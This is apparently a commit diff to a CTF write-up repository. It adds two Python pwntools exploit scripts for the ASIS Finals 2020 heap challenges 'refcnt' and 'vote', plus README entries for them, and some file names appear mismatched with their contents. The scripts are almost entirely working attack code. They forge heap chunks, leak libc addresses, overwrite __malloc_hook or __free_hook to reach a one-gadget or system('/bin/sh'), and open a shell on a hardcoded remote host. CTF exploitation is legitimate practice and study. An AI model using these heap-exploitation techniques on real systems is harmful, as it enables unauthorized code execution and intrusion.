Upload ASIS finals 2020

Author: KaoRz

ASIS_2020/refcnt/chall

@@ -0,0 +1,109 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.terminal = ["tmux", "sp", "-h"]
+#context.log_level = "debug"
+
+chall = ELF("./chall", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+
+def alloc(idx, size):
+    io.sendlineafter("Choice:", "1")
+    io.sendlineafter("Index:", str(idx))
+    io.sendlineafter("Size:", str(size))
+
+def edit(idx, data):
+    io.sendlineafter("Choice:", "2")
+    io.sendlineafter("Index:", str(idx))
+    io.sendafter("Data:", data)
+
+def show(idx):
+    io.sendlineafter("Choice:", "4")
+    io.sendlineafter("Index:", str(idx))
+
+def copy(frm, to):
+    io.sendlineafter("Choice:", "3")
+    io.sendlineafter("From:", str(frm))
+    io.sendlineafter("To:", str(to))
+
+def delete(idx):
+    io.sendlineafter("Choice:", "5")
+    io.sendlineafter("Index:", str(idx))
+
+io = remote("69.90.132.248", 1337)
+
+alloc(0, 0x90)
+
+copy(0, 0)
+edit(0, "A" * 8)
+copy(0, 0)
+
+alloc(1, 0x90)
+alloc(2, 0x90)
+
+copy(2, 3)
+edit(1, p8(0) * 0x0 + p64(0x51))
+
+alloc(0, 0x40)
+alloc(4, 0x40)
+
+edit(2, p8(0) * 0x8f + p8(0xf1))
+alloc(0, 0xe0)
+
+fake_chunk = p64(0) + p64(0xf1)
+fake_chunk += p64(0x1) + p64(0)
+
+for _ in range(7):
+    edit(0, p8(0) * 0x38 + fake_chunk)
+    copy(4, 4)
+
+alloc(1, 0xf0)      # Fix next chunk
+edit(1, p8(0) * 0x90 + p64(0x61))
+
+edit(0, p8(0) * 0x38 + fake_chunk)
+copy(4, 4)
+
+edit(0, "A" * 0x48)
+show(0)
+
+io.recvuntil("A" * 0x48)
+leaked_libc = u64(io.recvuntil("\n", drop = True).ljust(8, b"\x00"))
+libc.address = leaked_libc - 0x1ebbe1
+
+log.success("Leaked GLIBC address: " + hex(leaked_libc))
+log.info("GLIBC base address: " + hex(libc.address))
+
+fake_chunk = p64(0) + p64(0x51)
+fake_chunk += p64(0x1) + p64(0)
+
+edit(0, p8(0) * 0x38 + fake_chunk)
+copy(4, 4)
+
+fake_chunk = p64(0) + p64(0x51)
+fake_chunk += p64(0x1) + p64(0)
+
+edit(0, p8(0) * 0x38 + fake_chunk)
+copy(4, 4)
+
+fake_chunk = p64(0) + p64(0x51)
+fake_chunk += p64(libc.sym["__malloc_hook"] - 0x8) + p64(0)
+
+edit(0, p8(0) * 0x38 + fake_chunk)
+copy(4, 4)
+
+alloc(1, 0x40)
+
+fake_chunk = p64(0) + p64(0x51)
+fake_chunk += p64(0x2) + p64(0)
+
+edit(0, p8(0) * 0x38 + fake_chunk)
+
+alloc(2, 0x40)
+edit(2, p64(libc.address + 0xe6c7e))
+
+alloc(1, 0)
+
+io.interactive()
+io.close()
+
+

ASIS_2020/refcnt/libc.so.6

@@ -0,0 +1,84 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.terminal = ['tmux', 'sp', '-h']
+#context.log_level = 'DEBUG'
+
+HOST = "69.90.132.248"
+PORT = 3371
+
+elf = ELF("./vote")
+LOCAL = True
+
+IDs = []
+
+def create_vote(data, shell = False):
+    global IDs
+    io.recvuntil("> ")
+    io.sendline("5")
+    io.recvuntil("(y/n)?\n")
+    io.sendline("A")
+    io.recvuntil("age?\n")
+    io.sendline("1")
+    io.recvuntil("gender?\n")
+    io.sendline(data)
+    if not shell:
+        io.recvuntil("live?\n")
+        io.sendline("A")
+        io.recvuntil("vote?\n")
+        io.sendline("A")
+        io.recvuntil("ID is ")
+        IDs.append(io.recvuntil(".\n", drop = True))
+
+def update_vote(id, data):
+    global IDs
+    io.recvuntil("> ")
+    io.sendline("4")
+    io.recvuntil("ID: ")
+    io.sendline(IDs[id])
+    io.recvuntil("gender: ")
+    dump = io.recvuntil("\nWhat", drop = True)
+    io.recvuntil("gender?\n")
+    io.sendline(data)
+
+    return dump
+
+def delete_vote(id, pop = False):
+    global IDs
+    io.recvuntil("> ")
+    io.sendline("3")
+    io.recvuntil("ID: ")
+    io.sendline(IDs[id])
+    if pop:
+        IDs.pop(id)
+
+if LOCAL == True:
+    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec = False)
+    io = process(elf.path, env = {"LD_PRELOAD": libc.path})
+else:
+    libc = ELF("./libc.so.6", checksec = False)
+    io = remote(HOST, PORT)
+
+for _ in range(8):
+    create_vote("A" * 0x100)
+
+for i in range(7, 0, -1):
+    delete_vote(i)
+
+delete_vote(0)
+libc_leak = u64(update_vote(0, "")[8:16])
+libc.address = libc_leak - 0x1e4ca0     # Remote: not the right offset
+
+log.success("Leaked GLIBC address: " + hex(libc_leak))
+log.info("GLIBC base address: " + hex(libc.address))
+log.info("__free_hook@@GLIBC: " + hex(libc.sym["__free_hook"]))
+log.info("__malloc_hook@@GLIBC: " + hex(libc.sym["__malloc_hook"]))
+log.info("system@@GLIBC: " + hex(libc.sym["system"]))
+
+update_vote(1, p64(libc.sym["__free_hook"] - 8))
+create_vote("A" * 0x100)
+create_vote(b"/bin/sh\x00" + p64(libc.sym["system"]) + p8(0) * 0xf0, shell = True)
+
+io.interactive()
+io.close()
+

ASIS_2020/refcnt/xpl.py

@@ -15,6 +15,8 @@
 | Penpal World - Redpwn CTF 2019 | [Penpal World exploit](../master/penpal_world_redpwnCTF2019/exploit.py) |
 | one - SECCON 2019 | [one exploit](../master/one_SECCON_2019/exploit.py) |
 | Chromatic Aberration - CONFidence 2020 CTF | [chromatic exploit](../master/chromatic_aberration/pwn.js) |
+| refcnt - ASIS Finals 2020 CTF | [refcnt exploit](../master/ASIS_2020/refcnt/xpl.py) |
+| vote - ASIS Finals 2020 CTF | [vote exploit](../master/ASIS_2020/vote/xpl.py) |
 
 | Vulnerabilities | Exploit |
 | --- | --- |